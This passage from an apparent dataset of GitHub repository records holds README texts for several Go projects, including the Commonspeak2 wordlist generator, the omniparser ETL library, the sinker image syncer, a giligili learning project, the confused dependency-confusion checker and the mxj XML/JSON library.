Commonspeak2 will prompt to confirm that this is OK. To skip this prompt use the `--silent` flag.\n\nWhen this is ran on for Rails routes, Commonspeak2 does the following:\n\n1) Pulls Rails routes from `config/routes.rb` using Regex and the latest Github dataset.\n2) Processes the data, converts it into paths and does contexual replacements to make the path valid (i.e. converting `/:id` to `/1234`)\n3) Normalizes the path, finally saving to disk after all the processing is complete.\n\n**Scheduled Wordlist Generation**\n\nPlanned feature to use a cron-like system to allow for wordlist generation from BigQuery to happen continuously.\n\nWhen this command is introduced, we will insert the `--schedule` parameter to any of our pre-existing commands covered in this README like so:\n\n`\u27e9 ./commonspeak2 --project crunchbox-160315 --credentials credentials.json --schedule weekly routes --frameworks nodejs,tomcat -l 100000 -o nodejs-tomcat-routes.txt`\n\nThe above query will run a weekly BigQuery and save the output to `./nodejs-tomcat-routes.txt`.\n\n**Substitutions and Alterations**\n\nGenerate smart substitutions and alterations for the datasets that it makes sense for. For example, converting string values from `/admin/users/:id` to `/admin/users/1234` (contextually aware of the number).\n\nCredits\n----\n\nShubham Shah [@infosec_au](https://twitter.com/infosec_au)\n\nMichael Gianarakis [@mgianarakis](https://twitter.com/mgianarakis)\n\nLicense\n----\n\n```\n Copyright 2018 Assetnote\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n```\n\n[Assetnote Pty. 
Ltd.](https://assetnote.io/) - Twitter [@assetnote](https://twitter.com/assetnote)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jf-tech/omniparser", "link": "https://github.com/jf-tech/omniparser", "tags": ["transform", "etl", "xml", "json", "csv", "fixed-length", "edi", "x12", "edifact", "parser", "schema", "javascript", "codeless", "golang", "schemas", "delimited", "fixed-width", "streaming", "txt"], "stars": 543, "description": "omniparser: a native Golang ETL streaming parser and transform library for CSV, JSON, XML, EDI, text, etc.", "lang": "Go", "repo_lang": "", "readme": "# omniparser\n![CI](https://github.com/jf-tech/omniparser/workflows/CI/badge.svg)\n[![codecov](https://codecov.io/gh/jf-tech/omniparser/branch/master/graph/badge.svg)](https://codecov.io/gh/jf-tech/omniparser)\n[![Go Report Card](https://goreportcard.com/badge/github.com/jf-tech/omniparser)](https://goreportcard.com/report/github.com/jf-tech/omniparser)\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/jf-tech/omniparser)](https://pkg.go.dev/github.com/jf-tech/omniparser)\n[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go)\n\nOmniparser is a native Golang ETL parser that ingests input data of various formats (**CSV, txt, fixed length/width,\nXML, EDI/X12/EDIFACT, JSON**, and custom formats) in streaming fashion and transforms data into desired JSON output\nbased on a schema written in JSON.\n\nMin Golang Version: 1.14\n\n## Licenses and Sponsorship\nOmniparser is publicly available under [MIT License](./LICENSE).\n[Individual and corporate sponsorships](https://github.com/sponsors/jf-tech/) are welcome and gratefully\nappreciated, and will be listed in the [SPONSORS](./sponsors/SPONSORS.md) page.\n[Company-level sponsors](https://github.com/sponsors/jf-tech/) get additional benefits and supports\ngranted in the [COMPANY LICENSE](./sponsors/COMPANY_LICENSE.md).\n\n## Documentation\n\nDocs:\n- [Getting Started](./doc/gettingstarted.md): a tutorial for writing your first omniparser schema.\n- [IDR](./doc/idr.md): in-memory data representation of ingested data for omniparser.\n- [XPath Based Record Filtering and Data Extraction](./doc/xpath.md): xpath queries are essential to omniparser schema\nwriting. Learn the concept and tricks in depth.\n- [All About Transforms](./doc/transforms.md): everything about `transform_declarations`.\n- [Use of `custom_func`, Specially `javascript`](./doc/use_of_custom_funcs.md): An in depth look of how `custom_func`\nis used, specially the all mighty `javascript` (and `javascript_with_context`).\n- [CSV Schema in Depth](./doc/csv2_in_depth.md): everything about schemas for CSV input.\n- [Fixed-Length Schema in Depth](./doc/fixedlength2_in_depth.md): everything about schemas for fixed-length (e.g. 
TXT)\ninput\n- [JSON/XML Schema in Depth](./doc/json_xml_in_depth.md): everything about schemas for JSON or XML input.\n- [EDI Schema in Depth](./doc/edi_in_depth.md): everything about schemas for EDI input.\n- [Programmability](./doc/programmability.md): Advanced techniques for using omniparser (or some of its components) in\nyour code.\n\nReferences:\n- [Custom Functions](./doc/customfuncs.md): a complete reference of all built-in custom functions.\n\nExamples:\n- [CSV Examples](extensions/omniv21/samples/csv2)\n- [Fixed-Length Examples](extensions/omniv21/samples/fixedlength2)\n- [JSON Examples](extensions/omniv21/samples/json)\n- [XML Examples](extensions/omniv21/samples/xml).\n- [EDI Examples](extensions/omniv21/samples/edi).\n- [Custom File Format](extensions/omniv21/samples/customfileformats/jsonlog)\n- [Custom Funcs](extensions/omniv21/samples/customfuncs)\n\nIn the example folders above you will find pairs of input files and their schema files. Then in the\n`.snapshots` sub directory, you'll find their corresponding output files.\n\n## Online Playground\n\nUse [The Playground](https://omniparser-prod-omniparser-qd0sj4.mo2.mogenius.io/) (may need to wait for a few seconds for instance to wake up)\nfor trying out schemas and inputs, yours or existing samples, to see how ingestion and transform work.\n\n![](./cli/cmd/web/playground-demo.gif)\n\n## Why\n- No good ETL transform/parser library exists in Golang.\n- Even looking into Java and other languages, choices aren't many and all have limitations:\n - [Smooks](https://www.smooks.org/) is dead, plus its EDI parsing/transform is too heavyweight, needing code-gen.\n - [BeanIO](http://beanio.org/) can't deal with EDI input.\n - [Jolt](https://github.com/bazaarvoice/jolt) can't deal with anything other than JSON input.\n - [JSONata](https://jsonata.org/) still only JSON -> JSON transform.\n- Many of the parsers/transforms don't support streaming read, loading entire input into memory - not acceptable in some\nsituations.\n\n## Requirements\n- Golang 1.14 or later.\n\n## Recent Major Feature Additions/Changes\n- 2022/09: v1.0.4 released: added `csv2` file format that supersedes the original `csv` format with support of hierarchical and nested records.\n- 2022/09: v1.0.3 released: added `fixedlength2` file format that supersedes the original `fixed-length` format with support of hierarchical and nested envelopes.\n- 1.0.0 Released!\n- Added `Transform.RawRecord()` for caller of omniparser to access the raw ingested record.\n- Deprecated `custom_parse` in favor of `custom_func` (`custom_parse` is still usable for\nback-compatibility, it is just removed from all public docs and samples).\n- Added `NonValidatingReader` EDI segment reader.\n- Added fixed-length file format support in omniv21 handler.\n- Added EDI file format support in omniv21 handler.\n- Major restructure/refactoring\n - Upgrade omni schema version to `omni.2.1` due a number of incompatible schema changes:\n - `'result_type'` -> `'type'`\n - `'ignore_error_and_return_empty_str` -> `'ignore_error'`\n - `'keep_leading_trailing_space'` -> `'no_trim'`\n - Changed how we handle custom functions: previously we always use strings as in param type as well as result param\n type. 
Not anymore, all types are supported for custom function in and out params.\n - Changed the way we package custom functions for extensions: previously we collected custom functions from all\n extensions and then passed all of them to the extension that is used; this feels weird, now only the custom\n functions included in a particular extension are used in that extension.\n - Deprecated/removed most of the custom functions in favor of using 'javascript'.\n - A number of package renaming.\n- Added CSV file format support in omniv2 handler.\n- Introduced IDR node cache for allocation recycling.\n- Introduced [IDR](./doc/idr.md) for in-memory data representation.\n- Added trie based high performance `times.SmartParse`.\n- Command line interface (one-off `transform` cmd or long-running http `server` mode).\n- `javascript` engine integration as a custom_func.\n- JSON stream parser.\n- Extensibility:\n - Ability to provide custom functions.\n - Ability to provide custom schema handler.\n - Ability to customize the built-in omniv2 schema handler's parsing code.\n - Ability to provide a new file format support to built-in omniv2 schema handler.\n\n## Footnotes\n- omniparser is a collaboration effort of [jf-tech](https://github.com/jf-tech/),[Simon](https://github.com/liangxibing)\nand [Steven](http://github.com/wangjia007bond).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "plexsystems/sinker", "link": "https://github.com/plexsystems/sinker", "tags": [], "stars": 543, "description": "A tool to sync images from one container registry to another", "lang": "Go", "repo_lang": "", "readme": "# Sinker\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/plexsystems/sinker)](https://goreportcard.com/report/github.com/plexsystems/sinker)\n[![GitHub release](https://img.shields.io/github/release/plexsystems/sinker.svg)](https://github.com/plexsystems/sinker/releases)\n\n![logo](assets/logo.png)\n\n`sinker` syncs container images from one registry to another. This is useful in cases when you rely on images that exist in a public container registry, but need to pull from a private registry.\n\nImages can be sync'd either by using [The image manifest](#the-image-manifest) or via the command line.\n\nSee the [example](https://github.com/plexsystems/sinker/tree/main/example) folder for more details on the produced files.\n\n## Installation\n\n`go install github.com/plexsystems/sinker@latest`\n\nReleases are also provided in the [releases](https://github.com/plexsystems/sinker/releases) tab on GitHub.\n\n## The image manifest\n\n### The target section\n\n```yaml\ntarget:\n host: mycompany.com\n repository: myteam\n```\n\nThe `target` section is where the images will be synced to. The above yaml would sync all images to the `myteam` repository hosted at `mycompany.com` (`mycompany.com/myteam/...`)\n\n### The images section\n\n```yaml\ntarget:\n host: mycompany.com\n repository: myteam\nsources:\n- repository: coreos/prometheus-operator\n host: quay.io\n tag: v0.40.0\n- repository: super/secret\n tag: v0.3.0\n auth:\n username: DOCKER_USER_ENV\n password: DOCKER_PASSWORD_ENV\n- repository: nginx\n digest: sha256:bbda10abb0b7dc57cfaab5d70ae55bd5aedfa3271686bace9818bba84cd22c29\n```\n\n### Optional host defaults to Docker Hub\n\nIn both the `target` and `sources` section, the `host` field is _optional_. 
When no host is set, the host is assumed to be Docker Hub.\n\n### Auth\n\nAll auth is handled by looking at the clients Docker auth. If the client can perform a `docker push` or `docker pull`, sinker will be able to as well.\n\nOptionally, the `auth` section allows you to set the names of _environment variables_ that will be used for creating basic auth to the registry. This could be useful in pipelines where auth is stored in environment variables.\n\n## Sync behavior\n\nIf the `target` registry supports nested paths, the entire source repository will be pushed to the target. For example, the `prometheus-operator` would be pushed to:\n\n```text\nmycompany.com/myteam/coreos/prometheus-operator:v0.40.0\n```\n\n**Registries that support nested paths:** Azure Container Registry (ACR), Amazon Elastic Container Registry (ECR), Google Container Registry (GCR)\n\nIf the `target` registry does _not_ support nested paths, only the base path of the source will be pushed to the target registry. For example, the `prometheus-operator` would be pushed to:\n\n```text\nmycompany.com/myteam/prometheus-operator:v0.40.0\n```\n\n**Registries that do not support nested paths:** Docker Hub, GitHub Container Registry, Quay.io\n\n## Demo\n\nAn example run of the `sinker pull` command which pulls all images specified in the image manifest.\n\n![demo](assets/sinker-pull-demo.gif)\n\nFor additional help, you can run `sinker help`.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gourouting/giligili", "link": "https://github.com/gourouting/giligili", "tags": [], "stars": 543, "description": "gin+gorm\u5f00\u53d1\u7684\u89c6\u9891\u7f51\u7ad9\u793a\u4f8b", "lang": "Go", "repo_lang": "", "readme": "# Station G: https://www.gourouting.com\n\nWelcome to [Station G](www.gourouting.com), this site is a learning project of [Singo](https://github.com/bydmm/singo) framework.\n\n## project address\n\nhttps://github.com/bydmm/giligili\n\n## Project Purpose\n\nThe project code is not written to actually operate a video station project.\n\nThe main purpose of this project is to facilitate everyone to learn how to use Golang to write a pure back-end project with front-end and back-end separation\n\n## IMPORTANT: HOW TO RUN\n\n#### 1. Learn Go Module to manage dependencies\n\nThis project has been migrated to use Go Module to manage dependencies, which is different from the beginning of the video! So it cannot run according to the method of the video.\n\nPlease refer to this video to understand what is Go Module: https://www.bilibili.com/video/av63052644/\n\nGo Module will let you solve all kinds of dependency problems in the future, so learning and using it is very valuable for you\n\n#### 2. Configure the database\n\nThis project depends on Mysql and Redis, which are used by any website project, so you need to install and start these two services in advance.\n\nIf you are a windows user, you can quickly solve the problem of mysql and redis installation, through: PHPStudy.\n\nThis video teaches you how to use PHPStudy in a few minutes, https://www.bilibili.com/video/av64485001/\n\nIf you are a hardcore user of OSX or linux, it is not a problem for you to start Mysql and Redis \ud83d\ude01\n\n#### 3. 
Configure environment variables\n\n> Set environment variables, you can refer to the documentation of singo framework: https://singo.gourouting.com/quick-guide/set-env.html\n\nSince each user's computer environment is different, we use environment variables to change some easily changeable properties.\n\nYou need to copy the .env.example file in the root directory of the project, then create a .env file, and then paste the content into it\n\n```ini\nMYSQL_DSN=\"user:password@tcp(ip:port)/dbname?charset=utf8&parseTime=True&loc=Local\" # mysql connection string\nREDIS_ADDR=\"127.0.0.1:6379\" # redis address\nREDIS_PW=\"\" # redis password (you can leave it blank)\nREDIS_DB=\"\" # redis database (you can leave it blank)\nSESSION_SECRET=\"youneedtoset\" # session key, the development environment does not need to be changed\nGIN_MODE=\"debug\" # Service status, development environment does not need to be changed\n# The following are the parameters of OSS object storage\n# Refer to this video to manage uploaded files: https://www.bilibili.com/video/av60189734/\nOSS_END_POINT=\"oss-cn-hongkong.aliyuncs.com\" # OSS endpoint\nOSS_ACCESS_KEY_ID=\"xxx\"\nOSS_ACCESS_KEY_SECRET=\"qqqq\"\nOSS_BUCKET=\"lalalal\"\n\n```\n\n#### Windows CMD system startup command\n\n```bash\nset GOPROXY=https://mirrors.aliyun.com/goproxy/\nset GO111MODULE=on\n\ngo run main.go\n```\n\n#### Windows Powershell system startup command\n\n```bash\n$env:GOPROXY = 'https://mirrors.aliyun.com/goproxy/'\n$env:GO111MODULE = 'on'\n\ngo run main.go\n```\n\n#### linux / OSX system boot\n\n```bash\nexport GOPROXY=https://mirrors.aliyun.com/goproxy/\nexport GO111MODULE=on\n\ngo run main.go\n```\n\n## Video Live Tutorial Series\n\n[Let's write a G station! Golang full-stack programming scene] (https://space.bilibili.com/10/channel/detail?cid=78794)\n\n## Singo framework\n\nUse Singo to develop web services, use the simplest architecture to implement a sufficient framework, and serve a large number of users\n\nhttps://github.com/bydmm/singo\n\n## Magic Interface Documentation\n\nAfter the service starts: http://localhost:3000/swagger/index.html\n\nThe interface document is located in the project swagger directory. 
Please read the documentation in the directory", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "visma-prodsec/confused", "link": "https://github.com/visma-prodsec/confused", "tags": ["namespaces", "pypi", "javascript", "python", "npm", "php", "confusion-detection", "infosec", "maven", "java"], "stars": 544, "description": "Tool to check for dependency confusion vulnerabilities in multiple package management systems", "lang": "Go", "repo_lang": "", "readme": "# Confused\n\nA tool for checking for lingering free namespaces for private package names referenced in dependency configuration\nfor Python (pypi) `requirements.txt`, JavaScript (npm) `package.json`, PHP (composer) `composer.json` or MVN (maven) `pom.xml`.\n\n## What is this all about?\n\nOn 9th of February 2021, a security researcher Alex Birsan [published an article](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)\nthat touched different resolve order flaws in dependency management tools present in multiple programming language ecosystems.\n\nMicrosoft [released a whitepaper](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)\ndescribing ways to mitigate the impact, while the root cause still remains.\n\n## Interpreting the tool output\n\n`confused` simply reads through a dependency definition file of an application and checks the public package repositories\nfor each dependency entry in that file. It will proceed to report all the package names that are not found in the public\nrepositories - a state that implies that a package might be vulnerable to this kind of attack, while this vector has not\nyet been exploited.\n\nThis however doesn't mean that an application isn't already being actively exploited. If you know your software is using\nprivate package repositories, you should ensure that the namespaces for your private packages have been claimed by a\ntrusted party (typically yourself or your company).\n\n### Known false positives\n\nSome packaging ecosystems like npm have a concept called \"scopes\" that can be either private or public. In short it means\na namespace that has an upper level - the scope. The scopes are not inherently visible publicly, which means that `confused`\ncannot reliably detect if it has been claimed. If your application uses scoped package names, you should ensure that a\ntrusted party has claimed the scope name in the public repositories.\n\n## Installation\n\n- [Download](https://github.com/visma-prodsec/confused/releases/latest) a prebuilt binary from [releases page](https://github.com/visma-prodsec/confused/releases/latest), unpack and run!\n\n _or_\n- If you have recent go compiler installed: `go get -u github.com/visma-prodsec/confused` (the same command works for updating)\n\n _or_\n- git clone https://github.com/visma-prodsec/confused ; cd confused ; go get ; go build\n\n## Usage\n```\nUsage:\n confused [-l LANGUAGENAME] depfilename.ext\n\nUsage of confused:\n -l string\n Package repository system. Possible values: \"pip\", \"npm\", \"composer\", \"mvn\", \"rubygems\" (default \"npm\")\n -s string\n Comma-separated list of known-secure namespaces. Supports wildcards\n -v Verbose output\n\n```\n\n## Example\n\n### Python (PyPI)\n```\n./confused -l pip requirements.txt\n\nIssues found, the following packages are not available in public package repositories:\n [!] 
internal_package1\n\n```\n\n### JavaScript (npm)\n```\n./confused -l npm package.json\n\nIssues found, the following packages are not available in public package repositories:\n [!] internal_package1\n [!] @mycompany/internal_package1\n [!] @mycompany/internal_package2\n\n# Example when @mycompany private scope has been registered in npm, using -s\n./confused -l npm -s '@mycompany/*' package.json\n\nIssues found, the following packages are not available in public package repositories:\n [!] internal_package1\n```\n\n### Maven (mvn)\n```\n./confused -l mvn pom.xml\n\nIssues found, the following packages are not available in public package repositories:\n [!] internal\n [!] internal/package1\n [!] internal/_package2\n\n```\n\n### Ruby (rubygems)\n```\n./confused -l rubygems Gemfile.lock\n\nIssues found, the following packages are not available in public package repositories:\n [!] internal\n [!] internal/package1\n [!] internal/_package2\n \n```", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "clbanning/mxj", "link": "https://github.com/clbanning/mxj", "tags": [], "stars": 543, "description": "Decode / encode XML to/from map[string]interface{} (or JSON); extract values with dot-notation paths and wildcards. Replaces x2j and j2x packages.", "lang": "Go", "repo_lang": "", "readme": "

# mxj - to/from maps, XML and JSON

Decode/encode XML to/from map[string]interface{} (or JSON) values, and extract/modify values from maps by key or key-path, including wildcards.

mxj supplants the legacy x2j and j2x packages. If you want the old syntax, use the mxj/x2j and mxj/j2x packages.

## Installation

Using go.mod:

    go get github.com/clbanning/mxj/v2@v2.7

    import "github.com/clbanning/mxj/v2"

... or just vendor the package.

## Related Packages

https://github.com/clbanning/checkxml provides functions for validating XML data.

## Refactor Encoder - 2020.05.01

Issue #70 highlighted that encoding large maps does not scale well, since the original logic used string append operations. Using bytes.Buffer results in linear scaling for very large XML docs. (Metrics based on MacBook Pro i7 w/ 16 GB.)

    Nodes     m.XML() time
    54809     12.53708ms
    109780    32.403183ms
    164678    59.826412ms
    482598    109.358007ms

## Refactor Decoder - 2015.11.15

For over a year I've wanted to refactor the XML-to-map[string]interface{} decoder to make it more performant. I recently took the time to do that, since we were using github.com/clbanning/mxj in a production system that could be deployed on a Raspberry Pi. Now the decoder is comparable to the stdlib JSON-to-map[string]interface{} decoder in terms of its additional processing overhead relative to decoding to a structure value. As shown by:

    BenchmarkNewMapXml-4             100000    18043 ns/op
    BenchmarkNewStructXml-4          100000    14892 ns/op
    BenchmarkNewMapJson-4            300000     4633 ns/op
    BenchmarkNewStructJson-4         300000     3427 ns/op
    BenchmarkNewMapXmlBooks-4         20000    82850 ns/op
    BenchmarkNewStructXmlBooks-4      20000    67822 ns/op
    BenchmarkNewMapJsonBooks-4       100000    17222 ns/op
    BenchmarkNewStructJsonBooks-4    100000    15309 ns/op

## Notices

    2022.11.28: v2.7 - add SetGlobalKeyMapPrefix to change default prefix, '#', for default keys
    2022.11.20: v2.6 - add NewMapFormattedXmlSeq for XML docs formatted with whitespace character
    2021.02.02: v2.5 - add XmlCheckIsValid toggle to force checking that the encoded XML is valid
    2020.12.14: v2.4 - add XMLEscapeCharsDecoder to preserve XML escaped characters in Map values
    2020.10.28: v2.3 - add TrimWhiteSpace option
    2020.05.01: v2.2 - optimize map to XML encoding for large XML docs.
    2019.07.04: v2.0 - remove unnecessary methods - mv.XmlWriterRaw, mv.XmlIndentWriterRaw - for Map and MapSeq.
    2019.07.04: Add MapSeq type and move associated functions and methods from Map to MapSeq.
    2019.01.21: DecodeSimpleValuesAsMap - decode to map[<tag>:map["#text":<value>]] rather than map[<tag>:<value>]
    2018.04.18: mv.Xml/mv.XmlIndent encodes non-map[string]interface{} map values - map[string]string, map[int]uint, etc.
    2018.03.29: mv.Gob/NewMapGob support gob encoding/decoding of Maps.
    2018.03.26: Added mxj/x2j-wrapper sub-package for migrating from legacy x2j package.
    2017.02.22: LeafNode paths can use ".N" syntax rather than "[N]" for list member indexing.
    2017.02.10: SetFieldSeparator changes field separator for args in UpdateValuesForPath, ValuesFor... methods.
    2017.02.06: Support XMPP stream processing - HandleXMPPStreamTag().
    2016.11.07: Preserve name space prefix syntax in XmlSeq parser - NewMapXmlSeq(), etc.
    2016.06.25: Support overriding default XML attribute prefix, "-", in Map keys - SetAttrPrefix().
    2016.05.26: Support customization of xml.Decoder by exposing CustomDecoder variable.
    2016.03.19: Escape invalid chars when encoding XML attribute and element values - XMLEscapeChars().
    2016.03.02: By default decoding XML with float64 and bool value casting will not cast "NaN", "Inf", and "-Inf".
                To cast them to float64, first set flag with CastNanInf(true).
    2016.02.22: New mv.Root(), mv.Elements(), mv.Attributes methods let you examine XML document structure.
    2016.02.16: Add CoerceKeysToLower() option to handle tags with mixed capitalization.
    2016.02.12: Seek for first xml.StartElement token; only return error if io.EOF is reached first (handles BOM).
    2015.12.02: XML decoding/encoding that preserves original structure of document. See NewMapXmlSeq()
                and mv.XmlSeq() / mv.XmlSeqIndent().
    2015-05-20: New: mv.StringIndentNoTypeInfo().
                Also, alphabetically sort map[string]interface{} values by key to prettify output for mv.Xml(),
                mv.XmlIndent(), mv.StringIndent(), mv.StringIndentNoTypeInfo().
    2014-11-09: IncludeTagSeqNum() adds "_seq" key with XML doc positional information.
                (NOTE: PreserveXmlList() is similar and will be here soon.)
    2014-09-18: inspired by NYTimes fork, added PrependAttrWithHyphen() to allow stripping hyphen from attribute tag.
    2014-08-02: AnyXml() and AnyXmlIndent() will try to marshal arbitrary values to XML.
    2014-04-28: ValuesForPath() and NewMap() now accept path with indexed array references.

## Basic Unmarshal XML to map[string]interface{}

    type Map map[string]interface{}

Create a `Map` value, 'mv', from any `map[string]interface{}` value, 'v':

    mv := Map(v)

Unmarshal / marshal XML as a `Map` value, 'mv':

    mv, err := NewMapXml(xmlValue) // unmarshal
    xmlValue, err := mv.Xml()      // marshal

Unmarshal XML from an `io.Reader` as a `Map` value, 'mv':

    mv, err := NewMapXmlReader(xmlReader)         // repeated calls, as with an os.File Reader, will process stream
    mv, raw, err := NewMapXmlReaderRaw(xmlReader) // 'raw' is the raw XML that was decoded

Marshal `Map` value, 'mv', to an XML Writer (`io.Writer`):

    err := mv.XmlWriter(xmlWriter)
    raw, err := mv.XmlWriterRaw(xmlWriter) // 'raw' is the raw XML that was written on xmlWriter

Also, for prettified output:

    xmlValue, err := mv.XmlIndent(prefix, indent, ...)
    err := mv.XmlIndentWriter(xmlWriter, prefix, indent, ...)
    raw, err := mv.XmlIndentWriterRaw(xmlWriter, prefix, indent, ...)

Bulk process XML with error handling (note: handlers must return a boolean value):

    err := HandleXmlReader(xmlReader, mapHandler(Map), errHandler(error))
    err := HandleXmlReaderRaw(xmlReader, mapHandler(Map, []byte), errHandler(error, []byte))

Converting XML to JSON: see Examples for `NewMapXml` and `HandleXmlReader`.

There are comparable functions and methods for JSON processing.

Arbitrary structure values can be decoded to / encoded from `Map` values:

    mv, err := NewMapStruct(structVal)
    err := mv.Struct(structPointer)

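To tie the calls above together, here is a minimal, self-contained sketch (not from the original README; the sample document, variable names, and the commented output are illustrative assumptions) that decodes XML into a `Map`, then re-encodes it as JSON and as XML:

```go
package main

import (
	"fmt"

	"github.com/clbanning/mxj/v2"
)

func main() {
	data := []byte(`<doc><name>alice</name><age>27</age></doc>`)

	// XML -> Map (a map[string]interface{})
	mv, err := mxj.NewMapXml(data)
	if err != nil {
		panic(err)
	}

	// Map -> JSON; values remain strings because no casting flag was passed
	jsonVal, _ := mv.Json()
	fmt.Println(string(jsonVal)) // e.g. {"doc":{"age":"27","name":"alice"}}

	// Map -> XML; element order inside <doc> is not guaranteed (see the encoding conventions below)
	xmlVal, _ := mv.Xml()
	fmt.Println(string(xmlVal))
}
```
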
## Extract / modify Map values

To work with XML tag values, JSON or Map key values or structure field values, decode the XML, JSON
or structure to a `Map` value, 'mv', or cast a `map[string]interface{}` value to a `Map` value, 'mv', then:

    paths := mv.PathsForKey(key)
    path := mv.PathForKeyShortest(key)
    values, err := mv.ValuesForKey(key, subkeys)
    values, err := mv.ValuesForPath(path, subkeys)
    count, err := mv.UpdateValuesForPath(newVal, path, subkeys)

Get everything at once, irrespective of path depth:

    leafnodes := mv.LeafNodes()
    leafvalues := mv.LeafValues()

A new `Map` with whatever keys are desired can be created from the current `Map` and then encoded in XML
or JSON. (Note: keys can use dot-notation.)

    newMap, err := mv.NewMap("oldKey_1:newKey_1", "oldKey_2:newKey_2", ..., "oldKey_N:newKey_N")
    newMap, err := mv.NewMap("oldKey1", "oldKey3", "oldKey5") // a subset of 'mv'; see "examples/partial.go"
    newXml, err := newMap.Xml()   // for example
    newJson, err := newMap.Json() // ditto

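As a concrete illustration of the key-path methods listed above, the following sketch (illustrative only; the sample document and the printed results are assumptions, not taken from the README) locates a key and pulls every value on a dotted path:

```go
package main

import (
	"fmt"

	"github.com/clbanning/mxj/v2"
)

func main() {
	data := []byte(`<doc>
	  <book><title>Go</title><price>30</price></book>
	  <book><title>XML</title><price>15</price></book>
	</doc>`)

	mv, err := mxj.NewMapXml(data)
	if err != nil {
		panic(err)
	}

	// Where does the key "title" occur in the document?
	fmt.Println(mv.PathsForKey("title")) // e.g. [doc.book.title]

	// Pull every value on that path; wildcard paths such as "doc.*.title" also work.
	titles, err := mv.ValuesForPath("doc.book.title")
	if err != nil {
		panic(err)
	}
	fmt.Println(titles) // e.g. [Go XML]
}
```
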
## Usage

The package is fairly well [self-documented with examples](http://godoc.org/github.com/clbanning/mxj).

Also, the subdirectory "examples" contains a wide range of examples, several taken from golang-nuts discussions.

## XML parsing conventions

Using NewMapXml()

 - Attributes are parsed to `map[string]interface{}` values by prefixing a hyphen, `-`,
   to the attribute label. (Unless overridden by `PrependAttrWithHyphen(false)` or
   `SetAttrPrefix()`.)
 - If the element is a simple element and has attributes, the element value
   is given the key `#text` for its `map[string]interface{}` representation. (See
   the 'atomFeedString.xml' test data, below.)
 - XML comments, directives, and process instructions are ignored.
 - If CoerceKeysToLower() has been called, then the resultant keys will be lower case.

Using NewMapXmlSeq()

 - Attributes are parsed to `map["#attr"]map[<attr_label>]map[string]interface{}` values
   where the `<attr_label>` value has "#text" and "#seq" keys - the "#text" key holds the
   value for `<attr_label>`.
 - All elements, except for the root, have a "#seq" key.
 - Comments, directives, and process instructions are unmarshalled into the Map using the
   keys "#comment", "#directive", and "#procinst", respectively. (See documentation for more
   specifics.)
 - Name space syntax is preserved:
   - `<ns:key>something</ns:key>` parses to `map["ns:key"]interface{}{"something"}`
   - `xmlns:ns="http://myns.com/ns"` parses to `map["xmlns:ns"]interface{}{"http://myns.com/ns"}`

Both

 - By default, "NaN", "Inf", and "-Inf" values are not cast to float64. If you want them
   to be cast, set a flag to cast them using CastNanInf(true).

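A short sketch of the `NewMapXml()` attribute and `#text` conventions described above (the input document and the commented output are illustrative assumptions, not from the README):

```go
package main

import (
	"fmt"

	"github.com/clbanning/mxj/v2"
)

func main() {
	// A simple element with an attribute: the attribute key gets a "-" prefix
	// and the element value is stored under the "#text" key.
	mv, err := mxj.NewMapXml([]byte(`<note lang="en">hello</note>`))
	if err != nil {
		panic(err)
	}
	fmt.Println(mv) // e.g. map[note:map[#text:hello -lang:en]]
}
```
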
## XML encoding conventions

 - 'nil' `Map` values, which may represent 'null' JSON values, are encoded as `<tag/>`.
   NOTE: the operation is not symmetric as `<tag/>` elements are decoded as `tag:""` `Map` values,
   which, then, encode in JSON as `"tag":""` values.
 - ALSO: there is no guarantee that the encoded XML doc will be the same as the decoded one. (Go
   randomizes the walk through map[string]interface{} values.) If you plan to re-encode the
   Map value to XML and want the same sequencing of elements look at NewMapXmlSeq() and
   mv.XmlSeq() - these try to preserve the element sequencing but with added complexity when
   working with the Map representation.

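The nil-value asymmetry noted above can be seen in a sketch like this (illustrative only; the exact printed output shape is an assumption):

```go
package main

import (
	"fmt"

	"github.com/clbanning/mxj/v2"
)

func main() {
	// A nil Map value encodes as a self-closing element...
	mv := mxj.Map(map[string]interface{}{"doc": map[string]interface{}{"note": nil}})
	xmlVal, _ := mv.Xml()
	fmt.Println(string(xmlVal)) // e.g. <doc><note/></doc>

	// ...but decoding that element back yields an empty string value, not nil.
	mv2, _ := mxj.NewMapXml(xmlVal)
	fmt.Println(mv2) // e.g. map[doc:map[note:]]
}
```
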
## Running "go test"

Because there are no guarantees on the sequence map elements are retrieved, the tests have been
written for visual verification in most cases. One advantage is that you can easily use the
output from running "go test" as examples of calling the various functions and methods.

## Motivation

\n\nI make extensive use of JSON for messaging and typically unmarshal the messages into\n`map[string]interface{}` values. This is easily done using `json.Unmarshal` from the\nstandard Go libraries. Unfortunately, many legacy solutions use structured\nXML messages; in those environments the applications would have to be refactored to\ninteroperate with my components.\n\nThe better solution is to just provide an alternative HTTP handler that receives\nXML messages and parses it into a `map[string]interface{}` value and then reuse\nall the JSON-based code. The Go `xml.Unmarshal()` function does not provide the same\noption of unmarshaling XML messages into `map[string]interface{}` values. So I wrote\na couple of small functions to fill this gap and released them as the x2j package.\n\nOver the next year and a half additional features were added, and the companion j2x\npackage was released to address XML encoding of arbitrary JSON and `map[string]interface{}`\nvalues. As part of a refactoring of our production system and looking at how we had been\nusing the x2j and j2x packages we found that we rarely performed direct XML-to-JSON or\nJSON-to_XML conversion and that working with the XML or JSON as `map[string]interface{}`\nvalues was the primary value. Thus, everything was refactored into the mxj package.\n\n", "readme_type": "markdown", 